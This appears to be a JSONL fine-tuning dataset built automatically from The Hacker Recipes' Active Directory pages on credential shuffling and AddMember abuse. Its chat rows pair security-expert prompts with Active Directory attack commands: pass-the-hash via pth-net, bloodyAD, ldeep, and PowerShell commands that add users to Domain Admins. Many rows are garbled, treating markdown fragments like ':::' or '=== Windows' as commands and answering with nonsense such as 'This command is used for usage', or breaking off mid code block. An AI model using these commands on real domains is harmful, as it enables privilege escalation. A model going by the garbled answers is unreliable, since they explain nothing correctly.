"source_file": "docs/src/ad/movement/credentials/impersonation.md", "page_title": "Impersonation", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `:::`?"}, {"role": "assistant", "content": "This command is used for usage. Usage"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `:::`?", "response": "This command is used for usage. Usage", "metadata": {"corpus_index": 383, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/impersonation.md", "page_title": "Impersonation", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Shuffling work?"}, {"role": "assistant", "content": "When credentials are found (through dumping or cracking for instance), attackers try to use them to obtain access to new resources and eventually dump new credentials. Those new credentials can then be used to access other resources, eventually find other credentials, and so forth. This process can theoretically be repeated until all resources have been carved out and all credentials have been found.\n\n> I’m calling this section “The Credential Theft Shuffle” (or “Credential Shuffle”) since it is difficult to encapsulate this activity simply. Think of it as a dance. Compromise a single workstation, escalate privileges, and dump credentials. Laterally move to other workstations using dumped credentials, escalate privileges, and dump more credentials.\n> \n> This usually quickly results in Domain Admin credentials since most Active Directory admins logon to their workstation with a user account and then use RunAs (which places their admin credentials on the local workstation) or RDP to connect to a server \\[...\\].\n> \n> (quote from Sean Metcalf in the part 4 \"Credential Theft Shuffle\" of adsecurity's \"Attack Methods for gaining Domain Admin Rights in Active Directory\" article)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Shuffling work?", "response": "When credentials are found (through dumping or cracking for instance), attackers try to use them to obtain access to new resources and eventually dump new credentials. Those new credentials can then be used to access other resources, eventually find other credentials, and so forth. This process can theoretically be repeated until all resources have been carved out and all credentials have been found.\n\n> I’m calling this section “The Credential Theft Shuffle” (or “Credential Shuffle”) since it is difficult to encapsulate this activity simply. Think of it as a dance. Compromise a single workstation, escalate privileges, and dump credentials. Laterally move to other workstations using dumped credentials, escalate privileges, and dump more credentials.\n> \n> This usually quickly results in Domain Admin credentials since most Active Directory admins logon to their workstation with a user account and then use RunAs (which places their admin credentials on the local workstation) or RDP to connect to a server \\[...\\].\n> \n> (quote from Sean Metcalf in the part 4 \"Credential Theft Shuffle\" of adsecurity's \"Attack Methods for gaining Domain Admin Rights in Active Directory\" article)", "metadata": {"corpus_index": 384, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/shuffling.md", "page_title": "Shuffling", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Shuffling"}, {"role": "assistant", "content": "When credentials are found (through dumping or cracking for instance), attackers try to use them to obtain access to new resources and eventually dump new credentials. Those new credentials can then be used to access other resources, eventually find other credentials, and so forth. This process can theoretically be repeated until all resources have been carved out and all credentials have been found.\n\n> I’m calling this section “The Credential Theft Shuffle” (or “Credential Shuffle”) since it is difficult to encapsulate this activity simply. Think of it as a dance. Compromise a single workstation, escalate privileges, and dump credentials. Laterally move to other workstations using dumped credentials, escalate privileges, and dump more credentials.\n> \n> This usually quickly results in Domain Admin credentials since most Active Directory admins logon to their workstation with a user account and then use RunAs (which places their admin credentials on the local workstation) or RDP to connect to a server \\[...\\].\n> \n> (quote from Sean Metcalf in the part 4 \"Credential Theft Shuffle\" of adsecurity's \"Attack Methods for gaining Domain Admin Rights in Active Directory\" article)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Shuffling", "response": "When credentials are found (through dumping or cracking for instance), attackers try to use them to obtain access to new resources and eventually dump new credentials. Those new credentials can then be used to access other resources, eventually find other credentials, and so forth. This process can theoretically be repeated until all resources have been carved out and all credentials have been found.\n\n> I’m calling this section “The Credential Theft Shuffle” (or “Credential Shuffle”) since it is difficult to encapsulate this activity simply. Think of it as a dance. Compromise a single workstation, escalate privileges, and dump credentials. Laterally move to other workstations using dumped credentials, escalate privileges, and dump more credentials.\n> \n> This usually quickly results in Domain Admin credentials since most Active Directory admins logon to their workstation with a user account and then use RunAs (which places their admin credentials on the local workstation) or RDP to connect to a server \\[...\\].\n> \n> (quote from Sean Metcalf in the part 4 \"Credential Theft Shuffle\" of adsecurity's \"Attack Methods for gaining Domain Admin Rights in Active Directory\" article)", "metadata": {"corpus_index": 384, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/shuffling.md", "page_title": "Shuffling", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is AddMember?"}, {"role": "assistant", "content": "This abuse can be carried out when controlling an object that has a GenericAll, GenericWrite, Self, AllExtendedRights or Self-Membership, over the target group.\n\n::: tabs\n\n=== UNIX-like\n\nIt can also be achieved from UNIX-like system with net, a tool for the administration of samba and cifs/smb clients. The pth-toolkit can also be used to run net commands with pass-the-hash.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is AddMember?", "response": "This abuse can be carried out when controlling an object that has a GenericAll, GenericWrite, Self, AllExtendedRights or Self-Membership, over the target group.\n\n::: tabs\n\n=== UNIX-like\n\nIt can also be achieved from UNIX-like system with net, a tool for the administration of samba and cifs/smb clients. The pth-toolkit can also be used to run net commands with pass-the-hash.\n\n```bash", "metadata": {"corpus_index": 385, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/addmember.md", "page_title": "AddMember", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute AddMember?"}, {"role": "assistant", "content": "This abuse can be carried out when controlling an object that has a GenericAll, GenericWrite, Self, AllExtendedRights or Self-Membership, over the target group.\n\n::: tabs\n\n=== UNIX-like\n\nIt can also be achieved from UNIX-like system with net, a tool for the administration of samba and cifs/smb clients. The pth-toolkit can also be used to run net commands with pass-the-hash.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute AddMember?", "response": "This abuse can be carried out when controlling an object that has a GenericAll, GenericWrite, Self, AllExtendedRights or Self-Membership, over the target group.\n\n::: tabs\n\n=== UNIX-like\n\nIt can also be achieved from UNIX-like system with net, a tool for the administration of samba and cifs/smb clients. The pth-toolkit can also be used to run net commands with pass-the-hash.\n\n```bash", "metadata": {"corpus_index": 385, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/addmember.md", "page_title": "AddMember", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does With net and cleartext credentials (will be prompted) work?"}, {"role": "assistant", "content": "net rpc group addmem \"$TargetGroup\" \"$TargetUser\" -U \"$DOMAIN\"/\"$USER\" -S \"$DC_HOST\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does With net and cleartext credentials (will be prompted) work?", "response": "net rpc group addmem \"$TargetGroup\" \"$TargetUser\" -U \"$DOMAIN\"/\"$USER\" -S \"$DC_HOST\"", "metadata": {"corpus_index": 386, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/addmember.md", "page_title": "AddMember", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute With net and cleartext credentials (will be prompted)?"}, {"role": "assistant", "content": "net rpc group addmem \"$TargetGroup\" \"$TargetUser\" -U \"$DOMAIN\"/\"$USER\" -S \"$DC_HOST\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute With net and cleartext credentials (will be prompted)?", "response": "net rpc group addmem \"$TargetGroup\" \"$TargetUser\" -U \"$DOMAIN\"/\"$USER\" -S \"$DC_HOST\"", "metadata": {"corpus_index": 386, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/addmember.md", "page_title": "AddMember", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does With net and cleartext credentials work?"}, {"role": "assistant", "content": "net rpc group addmem \"$TargetGroup\" \"$TargetUser\" -U \"$DOMAIN\"/\"$USER\"%\"$PASSWORD\" -S \"$DC_HOST\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does With net and cleartext credentials work?", "response": "net rpc group addmem \"$TargetGroup\" \"$TargetUser\" -U \"$DOMAIN\"/\"$USER\"%\"$PASSWORD\" -S \"$DC_HOST\"", "metadata": {"corpus_index": 387, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/addmember.md", "page_title": "AddMember", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for With net and cleartext credentials?"}, {"role": "assistant", "content": "net rpc group addmem \"$TargetGroup\" \"$TargetUser\" -U \"$DOMAIN\"/\"$USER\"%\"$PASSWORD\" -S \"$DC_HOST\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for With net and cleartext credentials?", "response": "net rpc group addmem \"$TargetGroup\" \"$TargetUser\" -U \"$DOMAIN\"/\"$USER\"%\"$PASSWORD\" -S \"$DC_HOST\"", "metadata": {"corpus_index": 387, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/addmember.md", "page_title": "AddMember", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does With Pass-the-Hash work?"}, {"role": "assistant", "content": "pth-net rpc group addmem \"$TargetGroup\" \"$TargetUser\" -U \"$DOMAIN\"/\"$USER\"%\"ffffffffffffffffffffffffffffffff\":\"$NT_HASH\" -S \"$DC_HOST\"\n``\n\nAlternative 1: Using bloodyAD\n\n`bash\nbloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" add groupMember \"$TargetGroup\" \"$TargetUser\"\n`\n\n---\nAlternative 2: Using ldeep (Python)\n\n> [!NOTE] NOTE\n> Use dn format for $TargetUser and $TargetGroup\n\n`bash\nldeep ldap -d \"$DOMAIN\" -s \"$DC_IP\" -u \"$USER\" -p \"$PASSWORD\" add_to_group \"$TargetUser\" \"$TargetGroup\"\n`\n\n=== Windows\n\nThe attacker can add a user/group/computer to a group. This can be achieved with a native command line, with the Active Directory PowerShell module, or with Add-DomainGroupMember (PowerView module).\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does With Pass-the-Hash work?", "response": "pth-net rpc group addmem \"$TargetGroup\" \"$TargetUser\" -U \"$DOMAIN\"/\"$USER\"%\"ffffffffffffffffffffffffffffffff\":\"$NT_HASH\" -S \"$DC_HOST\"\n``\n\nAlternative 1: Using bloodyAD\n\n`bash\nbloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" add groupMember \"$TargetGroup\" \"$TargetUser\"\n`\n\n---\nAlternative 2: Using ldeep (Python)\n\n> [!NOTE] NOTE\n> Use dn format for $TargetUser and $TargetGroup\n\n`bash\nldeep ldap -d \"$DOMAIN\" -s \"$DC_IP\" -u \"$USER\" -p \"$PASSWORD\" add_to_group \"$TargetUser\" \"$TargetGroup\"\n`\n\n=== Windows\n\nThe attacker can add a user/group/computer to a group. This can be achieved with a native command line, with the Active Directory PowerShell module, or with Add-DomainGroupMember (PowerView module).\n\n``bash", "metadata": {"corpus_index": 388, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/addmember.md", "page_title": "AddMember", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform With Pass-the-Hash?"}, {"role": "assistant", "content": "pth-net rpc group addmem \"$TargetGroup\" \"$TargetUser\" -U \"$DOMAIN\"/\"$USER\"%\"ffffffffffffffffffffffffffffffff\":\"$NT_HASH\" -S \"$DC_HOST\"\n``\n\nAlternative 1: Using bloodyAD\n\n`bash\nbloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" add groupMember \"$TargetGroup\" \"$TargetUser\"\n`\n\n---\nAlternative 2: Using ldeep (Python)\n\n> [!NOTE] NOTE\n> Use dn format for $TargetUser and $TargetGroup\n\n`bash\nldeep ldap -d \"$DOMAIN\" -s \"$DC_IP\" -u \"$USER\" -p \"$PASSWORD\" add_to_group \"$TargetUser\" \"$TargetGroup\"\n`\n\n=== Windows\n\nThe attacker can add a user/group/computer to a group. This can be achieved with a native command line, with the Active Directory PowerShell module, or with Add-DomainGroupMember (PowerView module).\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform With Pass-the-Hash?", "response": "pth-net rpc group addmem \"$TargetGroup\" \"$TargetUser\" -U \"$DOMAIN\"/\"$USER\"%\"ffffffffffffffffffffffffffffffff\":\"$NT_HASH\" -S \"$DC_HOST\"\n``\n\nAlternative 1: Using bloodyAD\n\n`bash\nbloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" add groupMember \"$TargetGroup\" \"$TargetUser\"\n`\n\n---\nAlternative 2: Using ldeep (Python)\n\n> [!NOTE] NOTE\n> Use dn format for $TargetUser and $TargetGroup\n\n`bash\nldeep ldap -d \"$DOMAIN\" -s \"$DC_IP\" -u \"$USER\" -p \"$PASSWORD\" add_to_group \"$TargetUser\" \"$TargetGroup\"\n`\n\n=== Windows\n\nThe attacker can add a user/group/computer to a group. This can be achieved with a native command line, with the Active Directory PowerShell module, or with Add-DomainGroupMember (PowerView module).\n\n``bash", "metadata": {"corpus_index": 388, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/addmember.md", "page_title": "AddMember", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for With Pass-the-Hash?"}, {"role": "assistant", "content": "**Alternative 1**: Using [bloodyAD](https://github.com/CravateRouge/bloodyAD)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for With Pass-the-Hash?", "response": "**Alternative 1**: Using [bloodyAD](https://github.com/CravateRouge/bloodyAD)", "metadata": {"corpus_index": 389, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/addmember.md", "page_title": "AddMember", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `**Alternative 1**: Using [bloodyAD](https://github.com/CravateRouge/bloodyAD)`?"}, {"role": "assistant", "content": "This command is used for with pass-the-hash. With Pass-the-Hash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `**Alternative 1**: Using [bloodyAD](https://github.com/CravateRouge/bloodyAD)`?", "response": "This command is used for with pass-the-hash. With Pass-the-Hash", "metadata": {"corpus_index": 389, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/addmember.md", "page_title": "AddMember", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do With Pass-the-Hash"}, {"role": "assistant", "content": "---\n**Alternative 2**: Using [ldeep](https://github.com/franc-pentest/ldeep) (Python)\n\n> [!NOTE] NOTE\n> Use dn format for $TargetUser and $TargetGroup"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do With Pass-the-Hash", "response": "---\n**Alternative 2**: Using [ldeep](https://github.com/franc-pentest/ldeep) (Python)\n\n> [!NOTE] NOTE\n> Use dn format for $TargetUser and $TargetGroup", "metadata": {"corpus_index": 390, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/addmember.md", "page_title": "AddMember", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `---`?"}, {"role": "assistant", "content": "This command is used for with pass-the-hash. With Pass-the-Hash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `---`?", "response": "This command is used for with pass-the-hash. With Pass-the-Hash", "metadata": {"corpus_index": 390, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/addmember.md", "page_title": "AddMember", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform With Pass-the-Hash?"}, {"role": "assistant", "content": "=== Windows\n\nThe attacker can add a user/group/computer to a group. This can be achieved with a native command line, with the Active Directory PowerShell module, or with [Add-DomainGroupMember](https://powersploit.readthedocs.io/en/latest/Recon/Add-DomainGroupMember/) ([PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1) module)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform With Pass-the-Hash?", "response": "=== Windows\n\nThe attacker can add a user/group/computer to a group. This can be achieved with a native command line, with the Active Directory PowerShell module, or with [Add-DomainGroupMember](https://powersploit.readthedocs.io/en/latest/Recon/Add-DomainGroupMember/) ([PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1) module).", "metadata": {"corpus_index": 391, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/addmember.md", "page_title": "AddMember", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== Windows`?"}, {"role": "assistant", "content": "This command is used for with pass-the-hash. With Pass-the-Hash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== Windows`?", "response": "This command is used for with pass-the-hash. With Pass-the-Hash", "metadata": {"corpus_index": 391, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/addmember.md", "page_title": "AddMember", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Powershell: Active Directory module?"}, {"role": "assistant", "content": "Add-ADGroupMember -Identity 'Domain Admins' -Members 'user'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Powershell: Active Directory module?", "response": "Add-ADGroupMember -Identity 'Domain Admins' -Members 'user'", "metadata": {"corpus_index": 392, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/addmember.md", "page_title": "AddMember", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Powershell: Active Directory module"}, {"role": "assistant", "content": "Add-ADGroupMember -Identity 'Domain Admins' -Members 'user'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Powershell: Active Directory module", "response": "Add-ADGroupMember -Identity 'Domain Admins' -Members 'user'", "metadata": {"corpus_index": 392, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/addmember.md", "page_title": "AddMember", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Powershell: PowerSploit module in the context of penetration testing"}, {"role": "assistant", "content": "Add-DomainGroupMember -Identity 'Domain Admins' -Members 'user'\n``\n\nThe Invoke-PassTheCert fork can also be used, authenticating through Schannel via PassTheCert (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Powershell: PowerSploit module in the context of penetration testing", "response": "Add-DomainGroupMember -Identity 'Domain Admins' -Members 'user'\n``\n\nThe Invoke-PassTheCert fork can also be used, authenticating through Schannel via PassTheCert (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell", "metadata": {"corpus_index": 393, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/addmember.md", "page_title": "AddMember", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Powershell: PowerSploit module?"}, {"role": "assistant", "content": "Add-DomainGroupMember -Identity 'Domain Admins' -Members 'user'\n``\n\nThe Invoke-PassTheCert fork can also be used, authenticating through Schannel via PassTheCert (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Powershell: PowerSploit module?", "response": "Add-DomainGroupMember -Identity 'Domain Admins' -Members 'user'\n``\n\nThe Invoke-PassTheCert fork can also be used, authenticating through Schannel via PassTheCert (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell", "metadata": {"corpus_index": 393, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/addmember.md", "page_title": "AddMember", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the The command to powershell: powersploit module"}, {"role": "assistant", "content": "The [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) fork can also be used, authenticating through Schannel via [PassTheCert](https://www.thehacker.recipes/ad/movement/schannel/passthecert) (PowerShell version).\n\n> Note: the [README](https://github.com/jamarir/Invoke-PassTheCert/blob/main/README.md) contains the methodology to request a certificate using [certreq](https://github.com/GhostPack/Certify/issues/13#issuecomment-3622538862) from Windows (with a password, or an NTHash)."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the The command to powershell: powersploit module", "response": "The [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) fork can also be used, authenticating through Schannel via [PassTheCert](https://www.thehacker.recipes/ad/movement/schannel/passthecert) (PowerShell version).\n\n> Note: the [README](https://github.com/jamarir/Invoke-PassTheCert/blob/main/README.md) contains the methodology to request a certificate using [certreq](https://github.com/GhostPack/Certify/issues/13#issuecomment-3622538862) from Windows (with a password, or an NTHash).", "metadata": {"corpus_index": 394, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/addmember.md", "page_title": "AddMember", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "The"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Powershell: PowerSploit module"}, {"role": "assistant", "content": "The [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) fork can also be used, authenticating through Schannel via [PassTheCert](https://www.thehacker.recipes/ad/movement/schannel/passthecert) (PowerShell version).\n\n> Note: the [README](https://github.com/jamarir/Invoke-PassTheCert/blob/main/README.md) contains the methodology to request a certificate using [certreq](https://github.com/GhostPack/Certify/issues/13#issuecomment-3622538862) from Windows (with a password, or an NTHash)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Powershell: PowerSploit module", "response": "The [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) fork can also be used, authenticating through Schannel via [PassTheCert](https://www.thehacker.recipes/ad/movement/schannel/passthecert) (PowerShell version).\n\n> Note: the [README](https://github.com/jamarir/Invoke-PassTheCert/blob/main/README.md) contains the methodology to request a certificate using [certreq](https://github.com/GhostPack/Certify/issues/13#issuecomment-3622538862) from Windows (with a password, or an NTHash).", "metadata": {"corpus_index": 394, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/addmember.md", "page_title": "AddMember", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `The [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) fork can also be used, authenticating through Schannel via [PassTheCert](https://www.thehacker.recipes/ad/movement/schannel/passthecert) (PowerShell version).`?"}, {"role": "assistant", "content": "This command is used for powershell: powersploit module. Powershell: PowerSploit module"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `The [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) fork can also be used, authenticating through Schannel via [PassTheCert](https://www.thehacker.recipes/ad/movement/schannel/passthecert) (PowerShell version).`?", "response": "This command is used for powershell: powersploit module. Powershell: PowerSploit module", "metadata": {"corpus_index": 394, "category": "active_directory", "source_file": 